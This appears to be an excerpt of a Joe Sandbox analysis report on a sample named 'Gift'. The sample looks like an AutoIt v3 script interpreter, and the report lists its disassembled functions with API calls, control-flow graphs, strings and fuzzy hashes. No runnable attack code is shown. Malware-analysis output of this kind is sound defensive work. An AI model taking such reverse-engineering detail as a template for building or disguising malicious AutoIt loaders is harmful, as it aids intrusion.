                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: fe71f73bf1e747ced525e9dcb421f47a1f004d98717ae97a961a393131731258
                                                                          • Instruction ID: ae86d61f13292d30ced970a702918b96da13f73dfb0e54306bb6b5df86219fb3
                                                                          • Opcode Fuzzy Hash: fe71f73bf1e747ced525e9dcb421f47a1f004d98717ae97a961a393131731258
                                                                          • Instruction Fuzzy Hash: 8A21E8B1924309AFDB029FA4EC8ABDE7BF8FB08700F00815AF510A62A0D7B25544CF95
                                                                          Function 002E2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 002F00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002E3094), ref: 002F00ED
                                                                            • Part of subcall function 002F08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002E309F), ref: 002F08E3
                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002E30E2
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003201BA
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003201FB
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00320239
                                                                          • _wcscat.LIBCMT ref: 00320292
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: 4dcb7a0b042eeb33926cfb8094c0abfde70198966f01e90243f183375fa2f9f4
                                                                          • Instruction ID: 522a091eea154a414df6a0ee2c3db120ab5fdb436305c07db2d0dfc40dfc6784
                                                                          • Opcode Fuzzy Hash: 4dcb7a0b042eeb33926cfb8094c0abfde70198966f01e90243f183375fa2f9f4
                                                                          • Instruction Fuzzy Hash: 23717D714157019AC316EF65E8819ABBBECFF86340F80492EF585C32A1EF329958CF52
                                                                          Function 002E514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002E5156
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 002E5165
                                                                          • LoadIconW.USER32(00000063), ref: 002E517C
                                                                          • LoadIconW.USER32(000000A4), ref: 002E518E
                                                                          • LoadIconW.USER32(000000A2), ref: 002E51A0
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002E51C6
                                                                          • RegisterClassExW.USER32(?), ref: 002E521C
                                                                            • Part of subcall function 002D3411: GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                            • Part of subcall function 002D3411: RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                            • Part of subcall function 002D3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                            • Part of subcall function 002D3411: InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                            • Part of subcall function 002D3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                            • Part of subcall function 002D3411: LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                            • Part of subcall function 002D3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: 7724b668628541824c2fb7504d1a9cddd07166bf1b8944d52565b88ce1ad1bdf
                                                                          • Instruction ID: 576f0835b07768112b11185799c934701b05900aa44e657a15d7be65b2f774ef
                                                                          • Opcode Fuzzy Hash: 7724b668628541824c2fb7504d1a9cddd07166bf1b8944d52565b88ce1ad1bdf
                                                                          • Instruction Fuzzy Hash: DB216D70934308AFEB169FA8ED0AB9E7BB8FB08710F00455AF544A62E0C3B76550DF84
                                                                          Function 00345E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 923 345e1d-345e54 call 2d4dc0 926 345e74-345e86 WSAStartup 923->926 927 345e56-345e63 call 2d502b 923->927 929 345e9d-345edb call 2e40cd call 2d4d37 call 2e402a inet_addr gethostbyname 926->929 930 345e88-345e98 call 327135 926->930 927->926 935 345e65-345e70 call 2d502b 927->935 944 345eec-345efc call 327135 929->944 945 345edd-345eea IcmpCreateFile 929->945 937 345ff6-345ffe 930->937 935->926 950 345fed-345ff1 call 2e1cb6 944->950 945->944 946 345f01-345f32 call 2f0fe6 call 2e433f 945->946 955 345f34-345f53 IcmpSendEcho 946->955 956 345f55-345f69 IcmpSendEcho 946->956 950->937 957 345f6d-345f6f 955->957 956->957 958 345f71-345f76 957->958 959 345fa2-345fa4 957->959 960 345f78-345f7d 958->960 961 345fba-345fcc call 2d4dc0 958->961 962 345fa6-345fb2 call 327135 959->962 964 345fb4-345fb8 960->964 965 345f7f-345f84 960->965 970 345fd2 961->970 971 345fce-345fd0 961->971 974 345fd4-345fe8 IcmpCloseHandle WSACleanup call 2e45ae 962->974 964->962 965->959 968 345f86-345f8b 965->968 972 345f8d-345f92 968->972 973 345f9a-345fa0 968->973 970->974 971->974 972->964 976 345f94-345f98 972->976 973->962 974->950 976->962
                                                                          APIs
                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00345E7E
                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00345EC3
                                                                          • gethostbyname.WS2_32(?), ref: 00345ECF
                                                                          • IcmpCreateFile.IPHLPAPI ref: 00345EDD
                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00345F4D
                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00345F63
                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00345FD8
                                                                          • WSACleanup.WSOCK32 ref: 00345FDE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                          • String ID: Ping
                                                                          • API String ID: 1028309954-2246546115
                                                                          • Opcode ID: c16ed29b22c87f8a461ebcc1b9ae23caa0b7c62da8977974e29a99cf8cf338bc
                                                                          • Instruction ID: 6c813b77b5b3b10d28b9da2aaa66354a80acdf477a23028943f75a132de41959
                                                                          • Opcode Fuzzy Hash: c16ed29b22c87f8a461ebcc1b9ae23caa0b7c62da8977974e29a99cf8cf338bc
                                                                          • Instruction Fuzzy Hash: 00516C31A04601DFD722AF25CC49B2AB7E4EF48710F158969F9559B2A2DB70ED14CB42
                                                                          Function 002E4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 977 2e4d83-2e4dd1 979 2e4dd3-2e4dd6 977->979 980 2e4e31-2e4e33 977->980 982 2e4dd8-2e4ddf 979->982 983 2e4e37 979->983 980->979 981 2e4e35 980->981 986 2e4e1a-2e4e22 DefWindowProcW 981->986 984 2e4ead-2e4eb5 PostQuitMessage 982->984 985 2e4de5-2e4dea 982->985 987 3209c2-3209f0 call 2dc460 call 2dc483 983->987 988 2e4e3d-2e4e40 983->988 993 2e4e61-2e4e63 984->993 989 320a35-320a49 call 332cce 985->989 990 2e4df0-2e4df2 985->990 992 2e4e28-2e4e2e 986->992 1022 3209f5-3209fc 987->1022 994 2e4e65-2e4e8c SetTimer RegisterWindowMessageW 988->994 995 2e4e42-2e4e43 988->995 989->993 1013 320a4f 989->1013 996 2e4df8-2e4dfd 990->996 997 2e4eb7-2e4ec1 call 2e5b29 990->997 993->992 994->993 998 2e4e8e-2e4e99 CreatePopupMenu 994->998 1001 320965-320968 995->1001 1002 2e4e49-2e4e5c KillTimer call 2e5ac3 call 2d34e4 995->1002 1003 320a1a-320a21 996->1003 1004 2e4e03-2e4e08 996->1004 1015 2e4ec6 997->1015 998->993 1008 32096a-32096c 1001->1008 1009 32099e-3209bd MoveWindow 1001->1009 1002->993 1003->986 1019 320a27-320a30 call 328854 1003->1019 1011 2e4e0e-2e4e14 1004->1011 1012 2e4e9b-2e4eab call 2e5bd7 1004->1012 1016 32096e-320971 1008->1016 1017 32098d-320999 SetFocus 1008->1017 1009->993 1011->986 1011->1022 1012->993 1013->986 1015->993 1016->1011 1023 320977-320988 call 2dc460 1016->1023 1017->993 1019->986 1022->986 1027 320a02-320a15 call 2e5ac3 call 2e59d3 1022->1027 1023->993 1027->986
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 002E4E22
                                                                          • KillTimer.USER32(?,00000001), ref: 002E4E4C
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E4E6F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E4E7A
                                                                          • CreatePopupMenu.USER32 ref: 002E4E8E
                                                                          • PostQuitMessage.USER32(00000000), ref: 002E4EAF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 1df4597ae9625f17f95bf7d05aa2033ec7ce4e0f8b0bebad5feccfc7bd915d8a
                                                                          • Instruction ID: 47766be1071dab76ce564c8b4bf35202166eb68ee8c8dd597132cb7a71d5fea1
                                                                          • Opcode Fuzzy Hash: 1df4597ae9625f17f95bf7d05aa2033ec7ce4e0f8b0bebad5feccfc7bd915d8a
                                                                          • Instruction Fuzzy Hash: EE41E9312B8286ABDF1B7F65DC4ABBB3659F741300F880526F542916E2CBA1AC709771
                                                                          Function 002E56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00320C5B
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _memset.LIBCMT ref: 002E5787
                                                                          • _wcscpy.LIBCMT ref: 002E57DB
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002E57EB
                                                                          • __swprintf.LIBCMT ref: 00320CD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                          • String ID: Line %d: $AutoIt -
                                                                          • API String ID: 230667853-4094128768
                                                                          • Opcode ID: 4a9d4a7dbefa33f2fcb5569fb2adbdee87ae8a0d5a3ec4c6f7a2cea3cb694e29
                                                                          • Instruction ID: a74eac34f9bbeeacd486d046d32996c65abdbed3a50a24d6d43d831e38312111
                                                                          • Opcode Fuzzy Hash: 4a9d4a7dbefa33f2fcb5569fb2adbdee87ae8a0d5a3ec4c6f7a2cea3cb694e29
                                                                          • Instruction Fuzzy Hash: 7741E671068354AAC326EB61DC85FDFB7ECAF44354F500A2EF185920E2DF709668CB96
                                                                          Function 002DAAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F07EC
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002F07F4
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F07FF
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F080A
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 002F0812
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 002F081A
                                                                            • Part of subcall function 002EFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002DAC6B), ref: 002EFFA7
                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002DAD08
                                                                          • OleInitialize.OLE32(00000000), ref: 002DAD85
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00312F56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID: <w9$\t9$s9
                                                                          • API String ID: 1986988660-3008030475
                                                                          • Opcode ID: 3cc71ad6ce30d7179fa0499bc9646549eb17bf55aeb8cbe76e6ae0942e69b0c0
                                                                          • Instruction ID: ecacd9dbded62565c12602330fece0afe0e940ac1822faa98056077ce5f23152
                                                                          • Opcode Fuzzy Hash: 3cc71ad6ce30d7179fa0499bc9646549eb17bf55aeb8cbe76e6ae0942e69b0c0
                                                                          • Instruction Fuzzy Hash: 7A81BBB49382408EC787EF6AAD8566A7FEDEB49304B10816BD418C72F2EB7244158F95
                                                                          Function 002E50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1228 2e50db-2e514b CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E5109
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E512A
                                                                          • ShowWindow.USER32(00000000), ref: 002E513E
                                                                          • ShowWindow.USER32(00000000), ref: 002E5147
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 8b4516776dd18858b9da5bc372241d9e9c5ee4bb5e42bc175a304248b3dde400
                                                                          • Instruction ID: 85027ab70e43658b0beeeebf34787f5668f3b05cb3b64758bc450d237d3ffb28
                                                                          • Opcode Fuzzy Hash: 8b4516776dd18858b9da5bc372241d9e9c5ee4bb5e42bc175a304248b3dde400
                                                                          • Instruction Fuzzy Hash: 05F03A705642907EFA361727AC09E672E7DD7C6F50F00441AB900A21F0C6A21840CAB4
                                                                          Function 00339B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1327 339b16-339b9b call 2e4a8c call 339cf1 1332 339ba5-339c31 call 2e4ab2 * 4 call 2e4a8c call 2f593c * 2 call 2e4ab2 1327->1332 1333 339b9d 1327->1333 1351 339c36-339c5c call 3396c4 call 338f0e 1332->1351 1334 339b9f-339ba0 1333->1334 1336 339ce8-339cee 1334->1336 1356 339c73-339c77 1351->1356 1357 339c5e-339c6e call 2f2f85 * 2 1351->1357 1359 339c79-339cd6 call 3390c1 call 2f2f85 1356->1359 1360 339cd8-339cde call 2f2f85 1356->1360 1357->1334 1368 339ce0-339ce6 1359->1368 1360->1368 1368->1336
                                                                          APIs
                                                                            • Part of subcall function 002E4A8C: _fseek.LIBCMT ref: 002E4AA4
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DE1
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DF4
                                                                          • _free.LIBCMT ref: 00339C5F
                                                                          • _free.LIBCMT ref: 00339C66
                                                                          • _free.LIBCMT ref: 00339CD1
                                                                            • Part of subcall function 002F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2F99
                                                                            • Part of subcall function 002F2F85: GetLastError.KERNEL32(00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2FAB
                                                                          • _free.LIBCMT ref: 00339CD9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 1552873950-2806939583
                                                                          • Opcode ID: fb742bb9de7d23a18b63cfd67b32db93db3e7707bb5983585faa17de6e3a4376
                                                                          • Instruction ID: 6ea138d072f5ca3276387c3b1a2a51ea3a14670b80d25cca916d8a7f3cadef29
                                                                          • Opcode Fuzzy Hash: fb742bb9de7d23a18b63cfd67b32db93db3e7707bb5983585faa17de6e3a4376
                                                                          • Instruction Fuzzy Hash: B45159B1D14259AFDF249F64DC81AAEBBB9FF48314F1001AEB209A3341DB715A948F58
                                                                          Function 002F563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                          • Instruction ID: a01d281905b3f9d643920318fdb5255309671576b5bc9ea76a6be08a0d60e6fb
                                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                          • Instruction Fuzzy Hash: A9519530A20B1EDBDB249E69988467EF7A5AF403A0F248739FB35D62D0D7709D608F40
                                                                          Function 002D52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D534A
                                                                          • TranslateMessage.USER32(?), ref: 002D5356
                                                                          • DispatchMessageW.USER32(?), ref: 002D5360
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          • Opcode ID: af230e6d768c2bcc11cf1fc90a55140029efde4e2a6cb00008c6542e25cd2622
                                                                          • Instruction ID: b2b6388ae42e91dadce6953cf403f220cf0fa8f5ee33e1b5823dcbb279ec6528
                                                                          • Opcode Fuzzy Hash: af230e6d768c2bcc11cf1fc90a55140029efde4e2a6cb00008c6542e25cd2622
                                                                          • Instruction Fuzzy Hash: 8C31E530938B069BEB728FA8DC48BBA77E89B01340F24409BE452862E0D7F29C55D711
                                                                          Function 002D1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12A8
                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12C9
                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12EB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: 5e25831460c72a444575ef41adbee2faba1da611f910152b39249ebaeb6ebf84
                                                                          • Instruction ID: 6bc687b160e2f40186c3c67853255cfac818ab055c2d6b1a00625d9d38baf550
                                                                          • Opcode Fuzzy Hash: 5e25831460c72a444575ef41adbee2faba1da611f910152b39249ebaeb6ebf84
                                                                          • Instruction Fuzzy Hash: 2E115E71920218BFDB258FA5DC45EAF7BBCEF04740F10855AF805D7610D3719E6097A0
